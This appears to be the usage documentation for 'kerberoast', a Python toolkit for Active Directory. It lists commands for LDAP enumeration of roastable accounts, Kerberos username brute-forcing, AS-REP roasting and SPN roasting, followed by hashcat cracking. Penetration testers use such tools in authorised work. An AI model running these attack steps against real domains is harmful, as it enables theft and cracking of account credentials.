Kerberoast – Kerberoast Attack -Pure Python-

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Kerberos attack toolkit -pure python- 


pip3 install kerberoast


Python 3.6 See requirements.txt

For the impatient

IMPORTANT: the accepted target url formats for LDAP and Kerberos are the following
<ldap_connection_url> : <protocol>+<auth-type>://<domain><user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain><user>:<password>@<ip_or_hostname>/?<param1>=<value1>

Steps -with SSPI-: kerberoast auto <DC_ip>

Steps -SSPI not used-:

  1. Look for vulnerable users via LDAP
    kerberoast ldap all <ldap_connection_url> -o ldapenum
  2. Use ASREP roast against users in the ldapenum_asrep_users.txt file
    kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
  3. Use SPN roast against users in the ldapenum_spn_users.txt file
    kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
  4. Crack SPN roast and ASPREP roast output with hashcat



This command group is for enumerating potentially vulnerable users via LDAP.

Command structure

    kerberoast ldap <type> <ldap_connection_url> <options>

Type: It supports three types of users to be enumerated

  1. spn Enumerates users with servicePrincipalName attribute set.
  2. asrep Enumerates users with DONT_REQ_PREAUTH flag set in their UAC attribute.
  3. all Startes all the above mentioned enumerations.

ldap_connection_url: Specifies the usercredential and the target server in the msldap url format (see help)

    -o: Output file base name


This command is to perform username enumeration by brute-forcing the kerberos service with possible username candidates

Command structure

    kerberoast brute <realm> <dc_ip> <targets> <options>

realm: The kerberos realm usually looks like COMPANY.corp
dc_ip: IP or hostname of the domain controller
targets: Path to the file which contains the possible username candidates
    -o: Output file base name


This command is to perform ASREProast attack

Command structure

    kerberoast asreproast <dc_ip> <options>

dc_ip: IP or hostname of the domain controller
    -r: Specifies the kerberos realm to be used. It overrides all other realm info.
    -o: Output file base name
    -t: Path to the file which contains the usernames to perform the attack on
    -u: Specifies the user to perform the attack on. Format is either <username> or <username>@<realm> but in the first case, the -r option must be used to specify the realm


This command is to perform SPNroast (AKA kerberoast) attack.

Command structure

    kerberoast spnroast <kerberos_connection_url> <options>

kerberos_connection_url: Specifies the usercredential and the target server in the kerberos URL format (see help)

    -r: Specifies the kerberos realm to be used. It overrides all other realm info.
    -o: Output file base name
    -t: Path to the file which contains the usernames to perform the attack on
    -u: Specifies the user to perform the attack on. Format is either <username> or <username>@<realm> but in the first case, the -r option must be used to specify the realm

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